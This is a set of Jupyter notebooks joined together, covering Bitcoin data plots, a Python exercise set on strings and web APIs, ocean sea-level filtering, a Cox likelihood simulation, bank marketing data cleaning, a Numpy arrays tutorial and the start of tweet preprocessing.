check_output("C:/Users/wang.yuhao/Documents/CoinWorks-master/perseus_4_beta/perseus.exe distmat ./dailyAmoMatrices/amo2017001.csv ./random_regression", shell=True) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/OccChainletsInTime.txt" def read_csv(file_path): total_tx = pd.read_csv(file_path, sep="\t") print(total_tx.head()) data_2017_all = total_tx[total_tx['year']==2017] print(data_2017_all) data_2017_total_tx = data_2017_all.loc[:, ['day', 'totaltx']] print(data_2017_total_tx) data_2017_total_tx = data_2017_total_tx['totaltx'].reset_index(drop=True) print(data_2017_total_tx) data_2017_total_tx = data_2017_total_tx.plot.line(figsize=(20,4)) data_2017_total_tx.figure.savefig('data_2017_total_tx.jpg') read_csv(input_path) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/pricedBitcoin2009-2018.csv" def read_csv(file_path): total_tx = pd.read_csv(file_path) print(total_tx.head()) data_2017_all = total_tx[total_tx['year']==2017] print(data_2017_all) data_2017_total_tx = data_2017_all.loc[:, ['price']].reset_index(drop=True) data_2017_total_tx_log = [] print(data_2017_total_tx) for i in range(1, 365): log_return = np.log(data_2017_total_tx.loc[i,'price']/data_2017_total_tx.loc[i-1,'price']) data_2017_total_tx_log.append(log_return) data_2017_total_tx_log = pd.DataFrame(data_2017_total_tx_log) data_2017_total_tx_log = data_2017_total_tx_log.plot.line(figsize=(20,4)) data_2017_total_tx_log.figure.savefig('data_2017_total_tx_log.jpg') read_csv(input_path) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/betti_0(100).csv" def read_csv(file_path): betti_0 = pd.read_csv(file_path, index_col=0) print(betti_0.head()) betti_0 = betti_0.mean(axis=1) print(betti_0) betti_0 = betti_0.plot.line(figsize=(20,4)) betti_0.figure.savefig('betti_0.jpg') read_csv(input_path) input_path = "C:/Users/wang.yuhao/Documents/ChainNet/data/original_data/betti_1(100).csv" def read_csv(file_path): betti_1 = pd.read_csv(file_path, index_col=0) print(betti_1.head()) betti_1 = betti_1.mean(axis=1) print(betti_1) betti_1 = betti_1.plot.line(figsize=(20,4)) betti_1.figure.savefig('betti_1.jpg') read_csv(input_path) ```
github_jupyter
# Exercise Set 3: Strings, requests and APIs *Morning, August 14, 2018* In this exercise set you will be working with collecting from the web. We will start out with some basic string operations and build on that to make a query for fetching data. In addition to DataCamp, you might find [this page](https://pythonprogramming.net/string-concatenation-formatting-intermediate-python-tutorial/) on pythonprogramming.net useful. [This page](https://www.python-course.eu/python3_sequential_data_types.php) give an introduction to the basics of strings and their related data types. ## Exercise Section 3.1: Basic string operations and dictionaries Strings have multiple operations and functions associated. In this exercise we investigate a few of these. We also explore the sequence form of a string and how it can be sliced and accessed via indices. > **Ex. 3.1.1**: Let `s1='Chameleon'` and `s2='ham'`. Check whether the string `s2` is a substring of `s1`. Is `'hello'` a substring `'goodbye'`? > *Hint*: One string operation is to check whether a string `S` contains a substring `T`, this can be done with the `in` operator: `S in T`. ``` # [Answer to Ex. 3.1.1] s1 = 'Chameleon' s2 = 'ham' if s2 in s1: print("ham is a substring of Chameleon... See? C-ham-eleon") ``` > **Ex. 3.1.2**: From the string `s1` select the last four characters. What is the index of the character `a` in `s1`? > *Hint*: We can selecting a substring by slicing it with the `[]` notation, from the start to end where start is included and end is excluded. Recall that Python has zero-based indexing, see explanation [here](https://softwareengineering.stackexchange.com/questions/110804/why-are-zero-based-arrays-the-norm). ``` # [Answer to Ex. 3.1.2] last_four = s1[-4:] print("The last four characters are '{l}', the 'a' sits at index {a}, since Python is 0-indexed".format(l= last_four, a = s1.find('a'))) ``` In addition to the techniques above strings are equipped with an array of _methods_, for solving more complex tasks. For example the `str.join(list)` method will insert a string in between each element of a list. Oppositely `str1.split(str2)` splits `str1` into a list. `.strip()` removes spaces in the beginning and end of a word and `.format()` fills in specified blanks in a string. Below we illustrate the use of each function ```python >>> ','.join(['a','b']) 'a,b' >>> ' Hello World! '.strip() 'Hello World!' >>> 'Hello {w}'.format(w='World!') 'Hello World!' >>> 'a,b,c'.split(',') ['a','b','c'] ``` > **Ex. 3.1.3:** Let `l1 = ['r ', 'Is', '>', ' < ', 'g ', '?']`. Create from `l1` the sentence "Is r > g?" using your knowledge about string formatting. Make sure there is only one space in between worlds. > >> _Hint:_ You should be able to combine the above informations to solve this exercise. ``` # [Answer to Ex. 3.1.3] # Will be in assignment 1 ``` ### Dictionaries Dictionaries (or simply dicts) are a central building block of python. Python dicts are constructed from pairs of keys and values making them extremely versatile for data storage. Furthermore dicts correspond directly to the json file format. > **Ex. 3.1.4**: Create an empty dictionary `words` using the `dict()`function. Then add each of the words in `['animal', 'coffee', 'python', 'unit', 'knowledge', 'tread', 'arise']` as a key, with the value being a boolean indicator for whether the word begins with a vowel. The results should look like `{'bacon': False, 'asynchronous': True ...}` > >> _Hint:_ You might want co first construct a function that asseses whether a given word begins with a vowel or not. ``` # [Answer to Ex. 3.1.4] # Will be in assignment 1 ``` > **Ex. 3.1.5:** Loop through the dictionary `words`. In each iteration you should print a proper sentence stating if the current word begins with a vowel or not. > _Hint:_ You can loop through both keys and values simultaneously with the `.items()` method. [This](https://www.tutorialspoint.com/python/python_dictionary.htm) might help you. ``` # [Answer to Ex. 3.1.5] for w,b in words.items(): if b: print('{word} begins with a vowel'.format(word = w)) else: print('{word} does not begin with a vowel'.format(word = w)) ``` <br> ## Exercise Section 3.2: The punk API The [punk API](https://punkapi.com/) serves information about _beers_. It is a well made and well documented API which makes it great for learning about APIs. > **Ex. 3.2.1:** Read the documentation on the Punk API available [here](https://punkapi.com/documentation/v2). What is the server url (i.e. root endpoint) of the Punk API? Does it require authentication? Then use the Punk API to make a request for beers brewed before December, 2008 with an ABV of at least 8. ``` # [Answer to Ex. 3.2.1] # Server URL is 'https://api.punkapi.com/v2/' # No authentication required import requests response = requests.get('https://api.punkapi.com/v2/beers?brewed_before=12-2008&abv_gt=8') ``` > **Ex. 3.2.2:** What object type is the API's JSON response? What about the individual items in the container? Convert the response object to a suitable format and answer the following questions: >> 1) How many beers are in the JSON object? >> >> 2) Print the names of the beers in the JSON object using lower case characters. >> >> 3) Select the beer called Paradox Islay from the JSON object. >> >> 4) Which hop ingredients does the Paradox Islay contain? ``` # [Answer to Ex. 3.2.2] # format is json (see documentation) beers = response.json() # 1) How many beers are in the JSON object? len(beers) # 2) Print the names of the beers in the JSON object using lower case characters. print('Beer names:', [b['name'].lower() for b in beers]) # 3) Select the beer called Paradox Islay from the JSON object. print('Paradox Islay is the 2nd entry, i.e. index 1.') b = beers[1] # 4) Which hop ingredients does the Paradox Islay contain? print('Ingredients in Paradox Islay:', set(i['name'] for i in b['ingredients']['hops'])) ``` > **Ex. 3.2.3:** Save the beers as a JSON file on your machine. > _Hint:_ you might want to take a look at the [json](https://docs.python.org/3/library/json.html) module. ``` # [Answer to Ex. 3.2.3] import json with open('beers.json', 'w') as f: f.write(json.dumps(beers)) ``` <br> ## Exercise Section 3.3: The DST API DST (Statistics Denmark) provide an API access to their aggregate data. For developers they supply a [console](https://api.statbank.dk/console) for testing. In this exercise we will first code up a simple script which can collect data from the DST API, and then introduce the [PyDST](https://kristianuruplarsen.github.io/PyDST/) package. > **Ex 3.3.1:** Use the API console to construct a GET request which retrieves the table FOLK1A split by quarter. The return should be in JSON format. We want all available dates. > >Then write a function `construct_link()` which takes as inputs: a table ID (e.g. `'FOLK1A'`) and a list of strings like `['var1=*', 'var2=somevalue']`. The function should return the proper URL for getting a dataset with the specified variables (e.g. in this case all levels of var1, but only where var2=somevalue). > _Hint:_ The time variable is called 'tid'. To select all available values, set the value-id to '*'. Spend a little time with the console to get a sense of how the URLs are constructed. ``` # [Answer to Ex. 3.3.1] # This is the manually constructed link 'https://api.statbank.dk/v1/data/FOLK1A/JSONSTAT?lang=en&Tid=*' # This function will do it for you def construct_link(table_id, variables): base = 'https://api.statbank.dk/v1/data/{id}/JSONSTAT?lang=en'.format(id = table_id) for var in variables: base += '&{v}'.format(v = var) return base construct_link('FOLK1A', ['Tid=*']) ``` When executing the request in the console you should get a json file as output. Next lets write some code to load these json files directly into python. > **Ex. 3.3.2:** use the `requests` module (get it with `pip install requests`) and `construct_link()` to request birth data from the "FOD" table. Get all available years (variable "Tid"), but only female births (BARNKON=P) . Unpack the json payload and store the result. Wrap the whole thing in a function which takes an url as input and returns the corresponding output. > _Hint:_ The `requests.response` object has a `.json()` method. ``` # [Answer to Ex. 3.3.2] # Will be in assignment 1 ``` > **Ex. 3.3.3:** Extract the number of girls born each year. Store the results as a list. ``` # [Answer to Ex. 3.3.3] girls = data['value'] ``` > ** Ex.3.3.4:** Repeat 3.3.2 and 3.3.3 but this time only get boy births (BARNKON=D). Store the numbers in a new list and use the `plot_births` (supplied below) function to plot the data. If you don't already have matplotlib installed run `pip install matplotlib`. ``` # Just run this once, do not change it. import matplotlib.pyplot as plt def plot_births(boys, girls): """ Plots lineplot of the number of births split by gender. Args: boys: a list of boy births by year girls: a list of girl births by year """ if not len(boys) == len(girls): raise ValueError('There must be the same number of observations for boys and girls') labels = ['{y}'.format(y=year) for year in range(1973,2018)] plt.plot(range(len(boys)), boys, color = 'blue', label = 'boys') plt.plot(range(len(boys)), girls, color = 'red', label = 'girls') plt.xticks([i for i in range(len(boys)) if i%4 == 0], [l for i,l in zip(range(len(boys)),labels) if i%4 == 0], rotation = 'vertical') plt.legend() plt.show() # [Answer to Ex. 3.3.4] s2 = construct_link('FOD', ['Tid=*', 'BARNKON=D']) boys = send_GET_request(s2)['value'] plot_births(boys, girls) ``` >**(Bonus question) Ex. 3.3.5:** Go to [https://kristianuruplarsen.github.io/PyDST/](https://kristianuruplarsen.github.io/PyDST/) follow the installation instructions and import PyDST. Try to replicate the birth figure from 3.3.4 using PyDST. Use [the documentation](https://kristianuruplarsen.github.io/PyDST/connection) to learn how the package works. > _Hint:_ PyDST does not use json or dicts as its primary data format, instead it uses pandas DataFrames. When you install PyDST it will install pandas as a dependency. If this doesn't work simply run `pip install pandas` in your console. DataFrames are very intuitive to work with, for example accessing a column named 'name' is simply `data['name']` or `data.name`. > > In the next session you will learn more about pandas and DataFrames. If you are more comfortable with dicts, the data_response class has a `.dict` method you can use. ``` # [Answer to Ex. 3.3.5] import PyDST import seaborn as sns; sns.set_style("whitegrid") conn = PyDST.connection(language = 'en') resp = conn.get_data('FOD', variables = ['Tid', 'BARNKON'], values = {'Tid': ['*'], 'BARNKON': ['*']} ) data = resp.df sns.lineplot('TID', 'INDHOLD', data = data, hue = 'BARNKON', markers=True, palette = ['blue', 'red']) ```
github_jupyter
``` # Importing all libraries. from pylab import * from netCDF4 import Dataset %matplotlib inline import os import cmocean as cm from trackeddy.tracking import * from trackeddy.datastruct import * from trackeddy.geometryfunc import * from trackeddy.init import * from trackeddy.physics import * from trackeddy.plotfunc import * import xarray as xr sla_file='/g/data3/hh5/tmp/akm157/mom01v5_kds75/output306/rregionsouthern_ocean_daily_eta_t.nc' mdt_file='/home/156/jm5970/github/trackeddy/data.input/meanssh_10yrs_AEXP.nc' dataset_mdt = Dataset(mdt_file,'r') lat_mdt = dataset_mdt.variables['Latitude'][:] lon_mdt = dataset_mdt.variables['Longitude'][:] mdt = dataset_mdt.variables['SSH_mean'][:,:,:] dataset_adt = Dataset(sla_file,'r') eta = dataset_adt.variables['eta_t'][:,:,:] sla = eta - mdt/100 time = dataset_adt.variables['time'][:] lat = dataset_adt.variables['yt_ocean_sub01'][:] lon = dataset_adt.variables['xt_ocean_sub01'][:] pcolormesh(lon,lat,sla[0,:,:]) colorbar() def circle(x,y,r): theta = linspace(0,2*np.pi,100) x_0 = r * cos(theta) +x y_0 = r * sin(theta) +y return x_0,y_0 def maskoutcontour(x_0,y_0,r,lon,lat,field,fillval=False): maskfield=np.zeros(np.shape(field)) #print(shape(field)) xin=find(lon,x_0-r) xfn=find(lon,x_0+r) yin=find(lat,y_0-r) yfn=find(lat,y_0+r) for ii in range(xin,xfn): for jj in range(yin,yfn): dist = np.sqrt((x_0 - lon[ii]) ** 2 + (y_0 - lat[jj]) ** 2) if dist <= r and shape(maskfield)[0]==len(lat): maskfield[jj,ii]=True elif dist <= r and shape(maskfield)[0]==len(lon): maskfield[ii,jj]=True maskfield[maskfield==0]=False msla = np.ma.masked_where(maskfield==False, field) pcolormesh(msla) show() return msla def maskoutcontour(x_0,y_0,r,lon,lat,field,fillval=False): maskfield=np.zeros(np.shape(field)) #print(shape(field)) for ii in range(0,len(lon)): for jj in range(0,len(lat)): dist = np.sqrt((x_0 - lon[ii]) ** 2 + (y_0 - lat[jj]) ** 2) if dist <= r and shape(maskfield)[0]==len(lat): maskfield[jj,ii]=True elif dist <= r and shape(maskfield)[0]==len(lon): maskfield[ii,jj]=True maskfield[maskfield==0]=False if fillval==False: msla = np.ma.masked_where(maskfield==fillval, field) #pcolormesh(field) #show() else: field[maskfield==False]=fillval msla=field #pcolormesh(maskfield) #show() return msla lat_cir=-50 lon_cir=-100 x_circle,y_circle=circle(lon_cir,lat_cir,3) mfield=maskoutcontour(lon_cir,lat_cir,3,lon,lat,sla[0,:,:]) print(shape(mfield)) pcolormesh(lon,lat,sla[0,:,:]) colorbar() pcolormesh(lon,lat,mfield) plot(x_circle,y_circle) radius=3 mask={} ii=1000 blank=ones(shape(sla)) xin=find(lon,lon[ii]-radius) xfn=find(lon,lon[ii]+radius) for jj in range(0,len(lat)): yin=find(lat,lat[jj]-radius) yfn=find(lat,lat[jj]+radius) mask[str(lat[jj])]= maskoutcontour(lon[ii],lat[jj],radius,lon[xin:xfn],lat[yin:yfn],blank[0,yin:yfn,xin:xfn]) #print(shape(mask[str(lat[jj])]),lat[jj]) sla[sla==sla[0,0,0]]=np.nan import time meanfiltered=zeros(shape(sla)) for tt in range(0,1): for ii in range(0,len(lon)): print(ii) init=time.clock() for jj in range(0,len(lat)): xin=find(lon,lon[ii]-radius) xfn=find(lon,lon[ii]+radius) yin=find(lat,lat[jj]-radius) yfn=find(lat,lat[jj]+radius) #print(ii<=find(lon,lon[0]+radius)) if ii < find(lon,lon[0]+radius): xinf=find(lon,lon[ii]-radius+360)-len(lon) data=hstack((sla[tt,yin:yfn,xinf:],sla[tt,yin:yfn,:xfn])) elif ii>find(lon,lon[len(lon)-1]-radius): xinf=find(lon,lon[ii]+radius-360) # print(xinf) data=hstack((sla[tt,yin:yfn,xin:],sla[tt,yin:yfn,:xinf])) # print(shape(data)) else: data=sla[tt,yin:yfn,xin:xfn] #print(lat[jj],shape(mask[str(lat[jj])])) if np.ma.is_masked(sla[tt,jj,ii])!=True or abs(sla[tt,jj,ii]) > 1000 : #print(np.shape(sla[tt,yin:yfn,xin:xfn]),shape(mask[str(lat[jj])])) #pcolormesh(mask[str(lat[jj])]) #show() #pcolormesh(mask[str(lat[jj])]) #colorbar() #show() mfield=data*mask[str(lat[jj])] #pcolormesh(mfield) #colorbar() #show() #mfield=maskoutcontour(lon[ii],lat[jj],3,lon[xin:xfn],lat[yin:yfn],sla[tt,yin:yfn,xin:xfn]) meanfiltered[tt,jj,ii]=nanmean(mfield) else: meanfiltered[tt,jj,ii]=np.nan print('Time Ellapsed:',time.clock()-init) print(0.75*len(lon)/60) pcolormesh(lon,lat,meanfiltered[0,:,:]) colorbar() pcolormesh(lon,lat,sla[0,:,:]) colorbar() show() pcolormesh(lon,lat,sla[0,:,:]-meanfiltered[0,:,:]) colorbar() show() slaa=xr.open_dataset(sla_file) x0=-100 y0=-50 l=3 import time meanfiltered=zeros(shape(sla)) for tt in range(0,1): for ii in range(0,len(lon)): x0=lon[ii] start = time.time() print(x0) for jj in range(0,len(lat)): y0=lat[jj] if np.ma.is_masked(sla[tt,jj,ii])!=True: mfield=slaa.eta_t[tt ,:,:].sel(xt_ocean_sub01=slice(x0-l, x0+l))\ .sel(yt_ocean_sub01=slice(y0-l,y0+l)).mean() meanfiltered[tt,jj,ii]=mfield.values #print(mfield.values) else: meanfiltered[tt,jj,ii]=np.nan end = time.time() print(end - start) pcolormesh(lon,lat,sla[0,:,:]-meanfiltered[0,:,:]) colorbar() def plot_spectrum(im_fft): from matplotlib.colors import LogNorm # A logarithmic colormap plt.imshow(np.abs(im_fft), norm=LogNorm()) plt.colorbar() from scipy import fftpack fft = fftpack.fft2(sla[0,:,:]) plt.figure() plot_spectrum(fft) plt.title('Fourier transform') # In the lines following, we'll make a copy of the original spectrum and # truncate coefficients. # Define the fraction of coefficients (in each direction) we keep keep_fraction = 0.02 # Call ff a copy of the original transform. Numpy arrays have a copy # method for this purpose. fft2 = fft.copy() # Set r and c to be the number of rows and columns of the array. r, c = fft2.shape # Set to zero all rows with indices between r*keep_fraction and # r*(1-keep_fraction): fft2[int(r*keep_fraction):int(r*(1-keep_fraction))] = 0 # Similarly with the columns: fft2[:, int(c*keep_fraction):int(c*(1-keep_fraction))] = 0 plt.figure() plot_spectrum(fft2) plt.title('Filtered Spectrum') sla_new = fftpack.ifft2(fft2).real pcolormesh(lon,lat,sla_new)#,vmin=-100,vmax=100) colorbar() from scipy import ndimage blur = ndimage.gaussian_filter(sla,4) pcolormesh(lon,lat,blur[0,:,:]) ```
github_jupyter
# Replication - Likelihood Approximation: Additional 1 (Large P) - Table Here we provide a notebook to replicate the simulation results for the likelihood approximations. These are additional simualtions to evaluate the impact of the number of covariates P on the approximation. This produced the table from the supplement. The notebook replicates the results in: - /out/simulation/tables/likelihood_approx_MPE_additional1.csv - /out/simulation/tables/likelihood_approx_MAPE_additional1.csv The main script can be found at: - /scripts/simulation/tables/likelihood_approx_additional1.py ``` # google colab specific - installing probcox !pip3 install probcox # Modules # ======================================================================================================================= import os import sys import shutil import subprocess import tqdm import numpy as np import pandas as pd import torch from torch.distributions import constraints import pyro import pyro.distributions as dist from pyro.infer import SVI, Trace_ELBO import matplotlib.pyplot as plt import warnings warnings.filterwarnings("ignore") import probcox as pcox dtype = torch.FloatTensor np.random.seed(90834) torch.manual_seed(873645) # Custom function for evaluation # ======================================================================================================================= # run the approximation 1000 times for a given setting and return MPE/MAPE def run(surv, pred, batch, est): total_obs = surv.shape[0] total_events = torch.sum(surv[:, -1] == 1).numpy().tolist() sampling_proportion = [total_obs, batch, total_events, None] ll = [] ll2 = [] while len(ll) <=1000: idx = np.unique(np.concatenate((np.random.choice(np.where(surv[:, -1]==1)[0], 2, replace=False), np.random.choice(range(surv.shape[0]), batch-2, replace=False)))) sampling_proportion[-1] = torch.sum(surv[idx, -1]).numpy().tolist() if torch.sum(surv[idx, -1]) > 1: e = pcox.CoxPartialLikelihood(pred=pred[idx], sampling_proportion=sampling_proportion).log_prob(surv=surv[idx]).detach().numpy() MPE = ((e-est)/est) MAPE = np.abs(MPE) ll.append(MPE.tolist()) ll2.append(MAPE.tolist()) return(np.mean(ll), np.mean(ll2)) # Simulation Settings # ======================================================================================================================= I = [10000] # individuals P = [500, 1000] # covariates C = [0.5, 0.75, 0.95, 0.99] # censorship B = [64, 128, 256, 512] # batch size # Simulation # ======================================================================================================================= res = np.zeros((8, 4)) res2 = np.zeros((8, 4)) sim_n =[] ii = 0 jj = 0 for p in P: # make baselinehazard cond = True scale = 100 while cond: theta = np.random.normal(0, 0.01, (p, 1)) TVC = pcox.TVC(theta=theta, P_binary=int(p/2), P_continuous=int(p/2), dtype=dtype) TVC.make_lambda0(scale=scale) s = np.sum([torch.sum(TVC.sample()[0][:, -1]).numpy() for ii in (range(1000))])/1000 if np.logical_and(s>=0.1, s<=0.9): cond = False scale = scale/5 theta_ = torch.normal(0, 0.01, (p, 1)).type(dtype) for i in I: for c in C: # make dataset print('s') surv, X = TVC.make_dataset(obs=i, fraction_censored=c) sim_n.append('I(N): ' + str(i) + '(' + str(surv.shape[0]) + ')' +', P: ' + str(p) + ', C: ' + str(c)) pred = torch.mm(X, theta_).type(dtype) est = pcox.CoxPartialLikelihood(pred=pred, sampling_proportion=None).log_prob(surv=surv).detach().numpy() # fit to batch for b in tqdm.tqdm(B): res[ii, jj], res2[ii, jj] = run(surv=surv, pred=pred, batch=b, est=est) jj += 1 ii += 1 jj = 0 res = np.round(res, 2) res2 = np.round(res2, 2) MPE = pd.DataFrame(np.concatenate((np.asarray(sim_n)[:, None], res.astype(str)), axis=1)) MAPE = pd.DataFrame(np.concatenate((np.asarray(sim_n)[:, None], res2.astype(str)), axis=1)) MPE MAPE ```
github_jupyter
# Exercise 2 ## Cleaning the data Now we have the data downloaded. We can will have to clean the data so that it is appropriate for training. ``` %matplotlib inline import pandas as pd bank_data = pd.read_csv('data/bank_data_feats.csv', index_col=0) bank_data.head(n=20) ``` Numerical columns - age - balance - day - duration - campaign - pdays - previous Binary columns - default - housing - loan Categorical columns to convert to dummy dummy columns - job - education - marital - contact - month - poutcome We can use the `describe` function to examine some properties of the numerical columns ``` bank_data.describe() ``` We can also look at the distribution of numerical values ``` import matplotlib.pyplot as plt %matplotlib inline bank_data.hist() ``` ### Converting non-numercal columns to numerical #### Binary columns Convert 'default' column to binary, rename to 'is_default' ``` bank_data['default'].value_counts() bank_data['default'].value_counts().plot(kind='bar') ``` We can see that this column is highly skewed, which makes sense, since according to the documentstion (data/bank-names.txt) this column indicates whether the customer has any credit in default. ``` bank_data['is_default'] = bank_data['default'].apply(lambda row: 1 if row == 'yes' else 0) ``` Let's look at the two columns side-by-side to get an understanding ``` bank_data[['default', 'is_default']].tail() ``` Do the same for housing, confirming that there are only two options, yes, and no ``` bank_data['housing'].value_counts() bank_data['housing'].value_counts().plot(kind='bar') bank_data['is_housing'] = bank_data['housing'].apply(lambda row: 1 if row == 'yes' else 0) ``` Repeat for loan ``` bank_data['loan'].value_counts() bank_data['loan'].value_counts().plot(kind='bar') bank_data['is_loan'] = bank_data['loan'].apply(lambda row: 1 if row == 'yes' else 0) ``` ### Categorical columns The other columns are categorical so we will have to deal with them a little differently. ``` bank_data['marital'].value_counts() bank_data['marital'].value_counts().plot(kind='bar') ``` We can see that there are three options for the marital column, so we will make this a categorical column. We can do this using the `get_dummies` function in the pandas library ``` help(pd.get_dummies) marital_dummies = pd.get_dummies(bank_data['marital']) pd.concat([bank_data['marital'], marital_dummies], axis=1).head(n=10) ``` We can see that there is a bit of redundant information here, we have three total options, but we know that whenever two of the columns are zero, the other column HAS to be 1, since everyone has to fall into one of the three options. We can then drop one of the columns and assume that a zero in the remaining columns means that the dropped column is true. Here we will drop the `divorced` column and change the name of the remaining columns from `married` to `is_married` and from `single` to `is_single` for consistency and clarity. ``` marital_dummies.drop('divorced', axis=1, inplace=True) marital_dummies.columns = [f'marital_{colname}' for colname in marital_dummies.columns] marital_dummies.head() ``` Now we will join it back to the original dataset ``` bank_data = pd.concat([bank_data, marital_dummies], axis=1) ``` Let's do the same for the `job`, `education`, and `contact` ``` bank_data['job'].value_counts() bank_data['job'].value_counts().plot(kind='bar') ``` The `unknown` value seems most appropriate to drop here ``` job_dummies = pd.get_dummies(bank_data['job']) job_dummies.drop('unknown', axis=1, inplace=True) ``` Let's also rename the columns so we know they came from the job field ``` job_dummies.columns = [f'job_{colname}' for colname in job_dummies.columns] bank_data = pd.concat([bank_data, job_dummies], axis=1) bank_data['education'].value_counts() bank_data['education'].value_counts().plot(kind='bar') edu_dummies = pd.get_dummies(bank_data['education']) edu_dummies.drop('unknown', axis=1, inplace=True) edu_dummies.columns = [f'education_{colname}' for colname in edu_dummies.columns] bank_data = pd.concat([bank_data, edu_dummies], axis=1) ``` And for the contact field ``` bank_data['contact'].value_counts() bank_data['contact'].value_counts().plot(kind='bar') contact_dummies = pd.get_dummies(bank_data['contact']) contact_dummies.drop('unknown', axis=1, inplace=True) contact_dummies.columns = [f'contact_{colname}' for colname in contact_dummies.columns] bank_data = pd.concat([bank_data, contact_dummies], axis=1) ``` For the `month` field we may want to do something a bit different because there is an inherent order to the months. In this case we may want to label the months in the chronological order. To do this we can create a map to represent the months as numbers and preserve the ordinality. ``` month_map = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec': 12} bank_data['month'].value_counts() bank_data['month'].value_counts().plot(kind='bar') ``` Whoa! The month is highly skewed, I wonder why there are so many entries in May? ``` bank_data['month'] = bank_data['month'].map(month_map) ``` And finally we'll do the same thing for the `poutcome` column, the resultas from the previous campaign. ``` bank_data['poutcome'].value_counts() bank_data['poutcome'].value_counts().plot(kind='bar') poutcome_dummies = pd.get_dummies(bank_data['poutcome']) poutcome_dummies.drop('unknown', axis=1, inplace=True) poutcome_dummies.columns = [f'poutcome_{colname}' for colname in poutcome_dummies.columns] bank_data = pd.concat([bank_data, poutcome_dummies], axis=1) bank_data.iloc[0] bank_data.drop(['job', 'education', 'marital', 'default', 'housing', 'loan', 'contact', 'poutcome'], axis=1, inplace=True, errors='ignore') ``` Let's check the data types to confirm that that the are all numerical ``` bank_data.dtypes ``` While the data may not be the most appropriate form to train a model, we can techincally train the model with it. Later on in the lesson we will tackle some more appropriate methods to represent the variables that will result in better model performance. We will save the models to csv files ``` bank_data.to_csv('data/bank_data_feats_a2.csv') ``` #### Target variable We can do a similar task to the target variable by making all the columns into numerical data types. We start by loading it in. ``` target = pd.read_csv('data/bank_data_target.csv', index_col=0) target.head(n=10) ``` This one should be easy since there's just one column, let's verify that there are only two options. ``` target['y'].value_counts() target['y'].value_counts().plot(kind='bar') target['y'] = target['y'].apply(lambda row: 1 if row=='yes' else 0) target.head(n=10) target.to_csv('data/bank_data_target_e2.csv') ```
github_jupyter
# Arrays While there are many kinds of collections in Python, we will work primarily with arrays in this class. The `numpy` package, abbreviated `np` in programs, provides Python programmers with convenient and powerful functions for creating and manipulating arrays. ``` import numpy as np ``` Arrays often contain numbers, but the can also contain strings or other types of values. However, a single array can only contain a single kind of data. (It usually doesn't make sense to group together unlike data anyway.) For example: ``` english_parts_of_speech = np.array(["noun", "pronoun", "verb", "adverb", "adjective", "conjunction", "preposition", "interjection"]) english_parts_of_speech ``` Returning to the temperature data, we create arrays of average daily [high temperatures](http://berkeleyearth.lbl.gov/auto/Regional/TMAX/Text/global-land-TMAX-Trend.txt) for the decades surrounding 1850, 1900, 1950, and 2000. ``` baseline_high = 14.48 highs = np.array([baseline_high - 0.880, baseline_high - 0.093, baseline_high + 0.105, baseline_high + 0.684]) highs ``` Arrays can be used in arithmetic expressions to compute over their contents. When an array is combined with a single number, that number is combined with each element of the array. Therefore, we can convert all of these temperatures to Fahrenheit by writing the familiar conversion formula. ``` (9/5) * highs + 32 ``` <img src="{{ site.baseurl }}/images/array_arithmetic.png"> Arrays also have *methods*, which are functions that operate on the array values. The `mean` of a collection of numbers is its average value: the sum divided by the length. Each pair of parentheses in the examples below is part of a call expression; it's calling a function with no arguments to perform a computation on the array called `highs`. ``` highs.size highs.sum() highs.mean() ``` #### Functions on Arrays Numpy provides various useful functions for operating on arrays. For example, the `diff` function computes the difference between each adjacent pair of elements in an array. The first element of the `diff` is the second element minus the first. ``` np.diff(highs) ``` The [full Numpy reference](http://docs.scipy.org/doc/numpy/reference/) lists these functions exhaustively, but only a small subset are used commonly for data processing applications. These are grouped into different packages within `np`. Learning this vocabulary is an important part of learning the Python language, so refer back to this list often as you work through examples and problems. However, you **don't need to memorize these**. Use this as a reference. Each of these functions takes an array as an argument and returns a single value. | **Function** | Description | |--------------------|----------------------------------------------------------------------| | `np.prod` | Multiply all elements together | | `np.sum` | Add all elements together | | `np.all` | Test whether all elements are true values (non-zero numbers are true)| | `np.any` | Test whether any elements are true values (non-zero numbers are true)| | `np.count_nonzero` | Count the number of non-zero elements | Each of these functions takes an array as an argument and returns an array of values. | **Function** | Description | |--------------------|----------------------------------------------------------------------| | `np.diff` | Difference between adjacent elements | | `np.round` | Round each number to the nearest integer (whole number) | | `np.cumprod` | A cumulative product: for each element, multiply all elements so far | | `np.cumsum` | A cumulative sum: for each element, add all elements so far | | `np.exp` | Exponentiate each element | | `np.log` | Take the natural logarithm of each element | | `np.sqrt` | Take the square root of each element | | `np.sort` | Sort the elements | Each of these functions takes an array of strings and returns an array. | **Function** | **Description** | |---------------------|--------------------------------------------------------------| | `np.char.lower` | Lowercase each element | | `np.char.upper` | Uppercase each element | | `np.char.strip` | Remove spaces at the beginning or end of each element | | `np.char.isalpha` | Whether each element is only letters (no numbers or symbols) | | `np.char.isnumeric` | Whether each element is only numeric (no letters) Each of these functions takes both an array of strings and a *search string*; each returns an array. | **Function** | **Description** | |----------------------|----------------------------------------------------------------------------------| | `np.char.count` | Count the number of times a search string appears among the elements of an array | | `np.char.find` | The position within each element that a search string is found first | | `np.char.rfind` | The position within each element that a search string is found last | | `np.char.startswith` | Whether each element starts with the search string {% data8page Arrays %}
github_jupyter
In this notebook we will be using the smtd_preprocessing.py file which is a preprocessing pileline for twitter data to pre-process our tweets and then train our own twitter embeddings. <br> We can find pre-trained twitter embedding ``` import os import sys import pandas as pd from gensim.models import Word2Vec import warnings warnings.filterwarnings('ignore') from nltk.tokenize import TweetTokenizer tweet_tokenizer = TweetTokenizer() PATH = "path to repo" preprocessing_path = PATH+"/practical-nlp/Ch8/O5smtd_preprocessing.py" sys.path.append(os.path.abspath(preprocessing_path)) import O5_smtd_preprocessing ``` Let's use the dir() function to find all the properties and methods in the package. ``` dir(smtd_preprocessing) ``` ## Read Data Let's read the data. Normally in csv files the values are separated by a ','.<br> In this case, it is separated by a ';' so we will specify the delimiter as ';'. ``` datapath = "/home/etherealenvy/github/practical-nlp/Ch8/Data/sts_gold_tweet.csv" df = pd.read_csv(datapath,error_bad_lines=False,delimiter=";") #let's have a loof at the dataset df.head() #pre-process tweets using our package df['tweet'] = df['tweet'].apply(lambda x: smtd_preprocessing.process_TweetText(x)) df['tweet'] = df['tweet'].apply(lambda x: tweet_tokenizer.tokenize(x)) tweets 